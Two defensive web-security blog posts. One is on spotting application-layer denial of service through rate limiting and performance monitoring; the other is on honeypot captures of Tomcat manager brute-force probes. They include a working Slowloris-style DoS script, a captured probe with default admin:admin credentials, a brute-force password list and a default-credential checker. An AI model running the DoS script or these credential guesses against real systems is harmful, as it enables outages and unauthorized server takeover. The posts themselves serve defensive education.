Tuesday, October 6, 2009

Identifying Denial of Service Conditions Through Performance Monitoring

Submitted by Ryan Barnett 10/06/2009

Here is an interesting web application threat modeling exercise for you - how do you plan to identify and mitigate web application level denial of service conditions on your web sites?

This is one of those pesky security questions that, on the surface, seems pretty straightforward, and then becomes much more challenging once you start peeling back the layers of complexity and interactions. Here are some items to keep in mind.

Network DoS vs. Web App DoS

Whereas network-level DoS attacks aim to flood your pipe with lower-layer OSI traffic (SYN packets, etc.), web application layer DoS attacks can often be achieved with much less traffic. Just take a look at RSnake's Slowloris tool if you want to see a perfect example of the fragility of web server availability. The point here is that the amount of traffic needed to cause an HTTP DoS condition is often far below what a network-level device would flag as anomalous, so it never gets reported the way traditional network-level botnet DDoS attacks would.
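To make that fragility concrete, here is a minimal Python sketch of a Slowloris-style slow client (this is not RSnake's actual code; the hostname, socket count, and timing values are illustrative assumptions, and it should only ever be pointed at a lab server you own). Each connection sends an incomplete request and then trickles header lines, holding a server worker slot open indefinitely:

import socket
import time

TARGET = "lab.example.com"   # assumption: your own test server
PORT = 80
SOCKET_COUNT = 150           # a trickle compared to a network-level flood
TRICKLE_INTERVAL = 10        # seconds between bogus header lines

def open_slow_socket():
    # Connect and send a deliberately incomplete HTTP request.
    s = socket.create_connection((TARGET, PORT), timeout=5)
    s.send(b"GET / HTTP/1.1\r\nHost: " + TARGET.encode() + b"\r\n")
    return s

sockets = [open_slow_socket() for _ in range(SOCKET_COUNT)]
while True:
    time.sleep(TRICKLE_INTERVAL)
    for s in list(sockets):
        try:
            # One more bogus header line; the request never completes,
            # so the server keeps the worker and socket allocated.
            s.send(b"X-a: b\r\n")
        except OSError:
            sockets.remove(s)

On servers with small, fixed worker pools, a few hundred such held-open sockets can be enough to refuse new clients, which is exactly why this traffic volume flies under network-level radar.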

Rate Limiting

A common identification/mitigation approach is rate limiting: set request threshold limits over a predefined period of time and monitor request traffic for violations (a sketch follows the list below). While this is certainly useful for identifying aggressive automated attacks, it has its own limitations.
  • What resources to protect?
While protecting a web application login page is straightforward, many web site owners have not properly identified which resources are both critical and susceptible to DoS conditions. Many web apps are extremely resource intensive and take a long time to complete - for example, any reporting interface that must query a back-end database to generate large reports. These apps are perfect DoS targets because the number of requests needed to consume open HTTP sockets and RAM is much lower than for a static resource.
  • What threshold to set?
Rate limiting is not a "one-size-fits-all" approach. It is highly dependent upon the resource itself. The threshold you would set against a login page to identify a brute force attack is much different than what you might set to identify a data scraping or DoS attack. The challenge for the defender is knowing ahead of time what to set. This is not easy, as most users are missing a significant piece of the puzzle - correlating web application performance statistics. You may set an inbound rate limiting threshold for a resource that is much too high, so the application fails under the load anyway (false negative), or much too low, so alerts fire even though the application handles the load just fine (false positive).
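For reference, here is a minimal Python sketch of the kind of per-client, per-resource sliding-window counter a rate limiter builds on. The window size and thresholds are illustrative assumptions, not recommendations - as noted above, picking those numbers correctly is the hard part:

import time
from collections import defaultdict, deque

# Assumption: per-resource thresholds chosen by the defender.
THRESHOLDS = {
    "/login": 10,        # requests per window per client
    "/reports/run": 3,   # resource-intensive endpoint gets a lower limit
}
WINDOW_SECONDS = 60

hits = defaultdict(deque)  # (client_ip, uri) -> recent request timestamps

def allow(client_ip, uri):
    # Return True if the request is under the sliding-window limit.
    limit = THRESHOLDS.get(uri)
    if limit is None:
        return True  # unmonitored resource
    now = time.time()
    window = hits[(client_ip, uri)]
    # Expire timestamps that have fallen out of the window.
    while window and window[0] <= now - WINDOW_SECONDS:
        window.popleft()
    if len(window) >= limit:
        return False  # violation: alert or block here
    window.append(now)
    return True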
Web Application Performance Monitoring

The best method for identifying fragile web resources and potential DoS thresholds is to actually monitor and track web application transaction processing times. Breach Security announced today that WebDefend 4.0 includes a new performance monitoring capability that aims to fill this important need.


With performance monitoring, the WAF user can track average transaction processing time, broken down into the combined average request time, web server processing time, and response time. The following definitions apply in this pane:

• Request time is measured from the first packet to the last packet of the request.

• Web server processing time is measured from the last packet of the request to the first packet of the response.

• Response time is measured from the first packet to the last packet of the response.
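As a rough illustration of those definitions, the three intervals fall out of four packet timestamps. This is a hedged sketch of the arithmetic the definitions imply, not WebDefend's implementation:

def transaction_timings(req_first, req_last, resp_first, resp_last):
    # Compute the three intervals (seconds) from packet timestamps.
    return {
        "request_time": req_last - req_first,      # first to last request packet
        "processing_time": resp_first - req_last,  # last request packet to first response packet
        "response_time": resp_last - resp_first,   # first to last response packet
    }

# Example: a report URL whose back-end query takes ~4.2s to answer.
print(transaction_timings(0.00, 0.05, 4.25, 4.40))

A long processing time with short request/response times points at the application (or its database); long request or response times point at the network or the client.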

With this information, it is easy to quickly identify the top URLs with high response latency and to pinpoint whether the cause is application processing or the network. This data gives a much truer picture of potential DoS conditions than rate limiting thresholds alone. For DoS threat modeling, its main advantages are identifying the fragile resources that would be susceptible to attack and deriving an estimated threshold setting, as the sketch below illustrates.
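As an example of turning measured processing times into a threshold estimate, here is a hedged back-of-the-envelope sketch based on Little's Law. The worker-pool size and measured average are assumptions standing in for your own performance data:

# Assumptions: a fixed server worker pool and an average measured by
# the WAF; both numbers here are illustrative, not recommendations.
WORKER_POOL_SIZE = 256            # concurrent requests the server can hold
avg_processing_seconds = 4.2      # measured average for a reporting URL
headroom = 0.5                    # budget only half of capacity to this URL

# Little's Law: sustainable rate = concurrency / average service time.
max_sustainable_rps = WORKER_POOL_SIZE / avg_processing_seconds
suggested_threshold_rps = max_sustainable_rps * headroom

print(f"capacity ~{max_sustainable_rps:.0f} req/s, "
      f"alert above ~{suggested_threshold_rps:.0f} req/s for this URL")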

Monday, October 5, 2009

WASC Honeypots - Apache Tomcat Admin Interface Probes

Submitted by Ryan Barnett 10/05/2009

We have seen some probes similar to the following in our WASC Distributed Open Proxy Honeypots -
GET /manager/html HTTP/1.1
Referer: http://obscured:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
Host: obscured:8080
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=
This appears to be a probe for the Apache Tomcat manager interface, based on the combination of the URI "/manager/html" and port 8080. The client is also submitting authentication data in the Authorization header; decoding the Base64 data reveals the credentials "admin:admin", which is the default username/password combination when Tomcat is installed.
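For reference, decoding the Basic auth token is a one-liner; the token below is copied verbatim from the probe above:

import base64

token = "YWRtaW46YWRtaW4="  # from the Authorization header above
print(base64.b64decode(token).decode())  # -> admin:admin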

WASC Honeypot participant Erwin Geirnaert has seen similar activity and provides more data here. The attackers are conducting brute force scans trying different passwords for the "manager" account -
manager:Test
manager:adminserver
manager:sqlserver
manager:2009
manager:159753
manager:1234qwerasdfzxcv
manager:1234qwerasdf
manager:1234qwer
manager:123qwe
manager:123qweasd
What do the attackers want to do once they gain access to the Tomcat server? Install backdoor/command WAR files so that they can execute code on the host. Time to double-check your default account passwords and implement ACLs so that only authorized clients can reach your management interfaces...
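As a quick self-check, here is a hedged sketch that tests your own Tomcat manager URL against a few of the weak combinations seen above. The hostname and candidate list are assumptions; run it only against servers you administer:

import base64
import urllib.error
import urllib.request

# Assumption: your own server; adjust host/port to match your deployment.
URL = "http://tomcat.example.internal:8080/manager/html"
CANDIDATES = [("admin", "admin"), ("manager", "manager"), ("tomcat", "tomcat")]

for user, password in CANDIDATES:
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(URL, headers={"Authorization": f"Basic {token}"})
    try:
        resp = urllib.request.urlopen(req, timeout=5)
        print(f"WEAK CREDENTIALS: {user}:{password} -> HTTP {resp.status}")
    except urllib.error.HTTPError as err:
        # 401 means the guess was rejected, which is what you want to see.
        print(f"rejected ({err.code}): {user}:{password}")
    except urllib.error.URLError as err:
        print(f"connection problem: {err.reason}")
        break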